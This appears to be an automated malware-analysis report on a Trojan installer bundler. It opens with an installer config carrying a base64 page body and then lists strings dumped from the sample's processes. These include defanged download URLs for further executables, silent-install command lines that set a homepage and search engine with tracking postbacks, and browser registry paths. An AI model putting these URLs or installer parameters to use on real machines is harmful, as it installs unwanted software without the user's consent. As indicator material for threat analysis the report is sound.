....<Array><page><f>1</f><fb>1</fb><pt>0</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><short_name></short_name><must_show>0</must_show><bdy>PGRpdiBjbGFzcz0iY2xhc3MtMWxpbmVyIj48ZGl2IGNsYXNzPSJjaGVjay1ob2xkZXIiPjxkaXYgY2xhc3M9ImNsYXNzLWNoZWNrLTEiIGlkPSJhbWlfY2hlY2tfTmF0aW9uWm9vbSIgb25jbGljaz0iQW1pQ2hlY2tDdHJsQ2xpY2tlZCgpIj4KICAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBpZD0iaV9hbWlfTmF0aW9uWm9vbSIgbmFtZT0iSG9ob3NlYXJjaCIgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iMSIgLz48L2Rpdj48ZGl2IGNsYXNzPSJjbGFzcy1saW5lMSI PHNwYW4 U2V0IEhvaG9zZWFyY2ggYXMgaG9tZXBhZ2UgYW5kIGRlZmF1bHQgc2VhcmNoIG9uIENocm9tZSBhbmQgRmlyZWZveCBicm93c2VyLjwvc3Bhbj48L2Rpdj48L2Rpdj48ZGl2IGNsYXNzPSJjbGFzcy1saW5lMiI PHNwYW4 QnkgY2xpY2tpbmcgIk5leHQiIG9yICJJbnN0YWxsIiBJIGFncmVlIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vdGlueXVybC5jb20vaDR3cjk5YiIgdGFyZ2V0PSJfYmxhbmsiPiBFdWxhPC9hPiBhbmQgPGEgaHJlZj0iaHR0cDovL3Rpbnl1cmwuY29tL2o5anQyeHYiIHRhcmdldD0iX2JsYW5rIj5Qcml2YWN5IFBvbGljeSA8L2E IGFuZCBjb25zZW50IHRvIGluc3RhbGwgSG9ob3NlYXJjaC48L3NwYW4 PC9kaXY PC9kaXY PGlucHV0IHR5cGU9ImhpZGRlbiIgdmFsdWU9IjEiIGlkPSJpX2FtaV9ub3AiLz48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iTmF0aW9uWm9vbSxub3AiIGlkPSJhbGxfc2hvcnRfbmFtZXMiLz4=</bdy><img>__empty__</img></page><page><f>1</f><fb>0</fb><pt>1</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><short_name>
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_600:
.text
`.rdata
@.data
.rsrc
@.reloc
f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xutility
f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xmbtowc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c
%s(%d) :
%s_%0x
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c
Client hook allocation failure at file %hs line %d.
Memory allocated at %hs(%d).
Client hook re-allocation failure at file %hs line %d.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
CRT detected that the application wrote to a heap buffer that was freed.
crt block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
%hs(%d) :
#File Error#(%d) :
Data: %s
f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c
Visual C CRT: Not enough memory to complete call to strerror.
f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c
_CrtDbgReport: String too long or IO Error
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s%s
f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c
f:\dd\vctools\crt_bld\self_x86\crt\src\input.c
%s(%d) : %s
_CrtDbgReport: String too long or Invalid characters in String
GetProcessWindowStation
f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\w_env.c
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\read.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c
Broken pipe
Inappropriate I/O control operation
Operation not permitted
f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c
portuguese-brazilian
Run-Time Check Failure #%d - %s
%s%s%s%s
%s%s%p%s%ld%s%d%s
operator
f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c
RegCloseKey
RegOpenKeyExW
f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xlocale
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xiosbase
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlexcept.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\streambuf
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h
C:\iPumper\iPumper\YoutubeUploader\SilentUpdater4\Release\ajdfhsjdh.pdb
RPCRT4.dll
RegOpenKeyW
RegCreateKeyW
ADVAPI32.dll
URLDownloadToFileW
urlmon.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
SHFileOperationW
SHELL32.dll
ole32.dll
OLEAUT32.dll
WinHttpReceiveResponse
WinHttpSetTimeouts
WinHttpSetOption
WinHttpGetIEProxyConfigForCurrentUser
WinHttpSendRequest
WinHttpWriteData
WinHttpConnect
WinHttpCloseHandle
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpOpen
WinHttpOpenRequest
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpReadData
WinHttpAddRequestHeaders
WINHTTP.dll
USERENV.dll
GetCPInfo
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp
%S(%d) :
ppCategory && pfnCrtDbgReport
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpcoll.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlmem.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlstr.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h
Bf:\dd\vctools\crt_bld\self_x86\crt\src\dbgdel.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fwscanf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c
Ff:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)
wcscpy_s(szExeName, 260, L"")
__crtMessageWindowW
f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
_CrtSetDbgFlag
(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)
_CrtMemCheckpoint
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcslwr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c
f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wmemcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fread.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c
("Invalid MBCS character sequence passed to strftime",0)
("Invalid MBCS character sequence passed into strftime",0)
strcpy_s(errmsg, (94+38+2), _get_sys_err_msg(errnum))
f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szExeName, 260, "")
__crtMessageWindowA
mscoree.dll
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\close.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportA
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportW
f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c
WUSER32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c
((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))
KERNEL32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\write.c
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")
wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")
_NMSG_WRITE
f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c
Bf:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c
user32.dll
f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c
ADVAPI32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\src\open.c
0 && "Only UTF-16 little endian & UTF-8 is supported for reads"
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c
f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c
("CRT Logic error during setenv",0)
__crtwsetenv
f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c
_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2
_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2
f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c
MSPDB100.DLL
MSPDB100.DLL
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c
strcpy_s(resultstr, resultsize, autofos.man)
strcpy_s(resultstr, resultsize, autofos.man)
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c
__crtsetenv
__crtsetenv
f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xstring
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xstring
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\vector
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\vector
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator *
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator *
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\memory
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\memory
std::vector,class std::allocator >,class std::allocator,class std::allocator > > >::operator []
std::vector,class std::allocator >,class std::allocator,class std::allocator > > >::operator []
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlconv.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlconv.h
hAtlThrow: hr = 0x%x
hAtlThrow: hr = 0x%x
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcore.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcore.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlbase.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlbase.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcoll.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcoll.h
c:\ipumper\ipumper\youtubeuploader\common\include\..\..\ThirdParty\ATLRegExp\atlrx.h
c:\ipumper\ipumper\youtubeuploader\common\include\..\..\ThirdParty\ATLRegExp\atlrx.h
WinHttpClient
WinHttpClient
std::vector >::operator []
std::vector >::operator []
std::_Vector_const_iterator > >::operator =
std::_Vector_const_iterator > >::operator =
std::_Vector_const_iterator > >::operator *
std::_Vector_const_iterator > >::operator *
std::_Vector_const_iterator > >::operator
std::_Vector_const_iterator > >::operator
{E4631BC4-65DE-4E77-A594-E81D5A671449}
{E4631BC4-65DE-4E77-A594-E81D5A671449}
iexplore.exe
iexplore.exe
--nopatching --silent --rfr=789249 --rfr_homepage=789185 --rfr_dse=789235 --rfr_vbm=789242 "--partner_homepage=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$__SIG&ovr=$__OVR&ref=789185&info=x54&chid=2568&caid=268&type=mhome" "--partner_dse=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$__SIG&ovr=$__OVR&ref=789235&info=x54&chid=2569&caid=268&type=msearch" "--partner_vbm=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$SIG&ovr=$_OVR&ref=789242&info=x54&chid=2570&caid=268&type=mvbm"
--nopatching --silent --rfr=789249 --rfr_homepage=789185 --rfr_dse=789235 --rfr_vbm=789242 "--partner_homepage=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$__SIG&ovr=$__OVR&ref=789185&info=x54&chid=2568&caid=268&type=mhome" "--partner_dse=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$__SIG&ovr=$__OVR&ref=789235&info=x54&chid=2569&caid=268&type=msearch" "--partner_vbm=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$SIG&ovr=$_OVR&ref=789242&info=x54&chid=2570&caid=268&type=mvbm"
MUpdater.exe
MUpdater.exe
hXXp://s3-us-west-2.amazonaws.com/upperservice/MUpdater.exe
hXXp://s3-us-west-2.amazonaws.com/upperservice/MUpdater.exe
x37.Costbar.exe
x37.Costbar.exe
hXXp://clklink.ru/uploads2/4cf37c9a-f28c-439e-bc02-01691d609e58/x37.Costbar.exe
hXXp://clklink.ru/uploads2/4cf37c9a-f28c-439e-bc02-01691d609e58/x37.Costbar.exe
360TS.exe
360TS.exe
hXXps://s3-us-west-2.amazonaws.com/upperservice/360TS.exe
hXXps://s3-us-west-2.amazonaws.com/upperservice/360TS.exe
WebOptimumSetup.exe
WebOptimumSetup.exe
hXXp://bscodecs.com/direct/downfold/lp.php?pub=exc353gi&campid=s1
hXXp://bscodecs.com/direct/downfold/lp.php?pub=exc353gi&campid=s1
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xtree
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xtree
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator ==
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator ==
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator =
std::_Vector_const_iterator,class std::allocator >,class std::allocator,class std::allocator > > > >::operator =
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator *
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator *
std::_String_const_iterator,class std::allocator >::operator =
std::_String_const_iterator,class std::allocator >::operator =
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\algorithm
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\algorithm
invalid operator
invalid operator
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator --
std::_Tree_const_iterator,class std::allocator >,class BundleControl *,struct std::less,class std::allocator > >,class std::allocator,class std::allocator > const ,class BundleControl *> >,0> > >::operator --
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcomcli.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcomcli.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
Warning: implicit LoadString(%u) failed
Warning: implicit LoadString(%u) failed
c:\%original file name%.exe
c:\%original file name%.exe
1.tmp.exe_3248:
.text
.rdata
.data
.rsrc
.reloc
1.0.6, 6-Sept-2010
(www.memtest86.com). At the time of writing it is free (GPLd).
bzip2/libbzip2: internal error number %d.
This is a bug in bzip2/libbzip2, %s.
Please report it to me at: jseward@bzip.org. If this happened
component, you should also report this bug to the author(s)
of that program. Please make an effort to report this bug;
timely and accurate bug reports eventually lead to higher
combined CRCs: stored = 0xx, computed = 0xx
{0xx, 0xx}
[%d: huff mtf
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
KERNEL32.dll
ole32.dll
RegOpenKeyW
ADVAPI32.dll
RegCloseKey
OLEAUT32.dll
RegOpenKeyExW
Kernel32.dll
ShellExecuteW
Shell32.dll
GetProcessHeap
GetCPInfo
bin.exe
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
USER32.DLL
KERNEL32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1.tmp.exe
7.24.4.6
xcd.exe
1.tmp.exe_3248_rwx_00350000_00030000:
.text
.rdata
.data
.rsrc
.reloc
Sending request %S
%S - transfer terminated
Error %d transferring %S
Status code %d returned from %S
Trying to redirect from %S to %S
AsyncWinHttp added contentLength %d to s_nTotalBytes2Download %d
Query Data: Error %d encountered (%S)
Read Data: Error %d encountered (%S)
AsyncWinHttp::AsyncCallback WINHTTP_CALLBACK_STATUS_DATA_AVAILABLE download error update total sizes.
WinHttpGetIEProxyConfigForCurrentUser
WinHttpSetStatusCallback
Download %S ended
Download from %S failed, status=%d, error=%d
%Y-%m-%d %H:%M:%S
RegOpenKeyExA
RegCloseKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ShellExecuteExW
"'\?&= %,/:!#$;[]()
Process=%S command=%S verb=%S, result=%d
operator
GetProcessWindowStation
C:\Amon\Current\BootStrapper\Release\Bundle.pdb
KERNEL32.dll
USER32.dll
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
WinHttpCloseHandle
WinHttpSetOption
WinHttpOpen
WinHttpSendRequest
WinHttpOpenRequest
WinHttpConnect
WinHttpCrackUrl
WinHttpGetProxyForUrl
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetCPInfo
GetProcessHeap
.?AVAsyncWinHttp@@
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
Winhttp.dll
ibnd.txt
.amonin
st.co
ex.php
instid[%s]
%S.ini
Wamitest.txt
Send Report Status
kernel32.dll
advapi32.dll
Iphlpapi.dll
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%S\Connection
v1.1.4322
v2.0.50727
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
%ProgramFiles%\Mozilla Firefox\firefox.exe
%localappdata%\Google\Chrome\Application\chrome.exe
%ProgramFiles%\Google\Chrome\Application\chrome.exe
shell32.dll
%d.%d.%d.%d
%%X
version.dll
ole32.dll
OleAut32.dll
KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
USER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1.tmp.exe
1.0.0.1
Setup.exe
amisetup7849__99999_il2.exe_3340:
.text
.rdata
.data
.rsrc
.reloc
1.0.6, 6-Sept-2010
(www.memtest86.com). At the time of writing it is free (GPLd).
bzip2/libbzip2: internal error number %d.
This is a bug in bzip2/libbzip2, %s.
Please report it to me at: jseward@bzip.org. If this happened
component, you should also report this bug to the author(s)
of that program. Please make an effort to report this bug;
timely and accurate bug reports eventually lead to higher
combined CRCs: stored = 0xx, computed = 0xx
{0xx, 0xx}
[%d: huff mtf
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
KERNEL32.dll
GetProcessHeap
GetCPInfo
bin.exe
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
USER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7849__99999_il2.exe
1.0.0.0
xcd.exe
amisetup7849__99999_il2.exe_3340_rwx_023D0000_000B4000:
.text
.rdata
.data
.rsrc
.reloc
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
%c%c%c%c
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
telexes.compiles.1 = s 'Inst Class'
CLSID = s '{4cf1ec1d-2055-4a46-b248-11fb57f52868}'
telexes.compiles = s 'Inst Class'
CurVer = s 'telexes.compiles.1'
ForceRemove {4cf1ec1d-2055-4a46-b248-11fb57f52868} = s 'Inst Class'
ProgID = s 'telexes.compiles.1'
VersionIndependentProgID = s 'telexes.compiles'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{de2deba6-37b4-4d2f-8a78-56effa49ba84}'
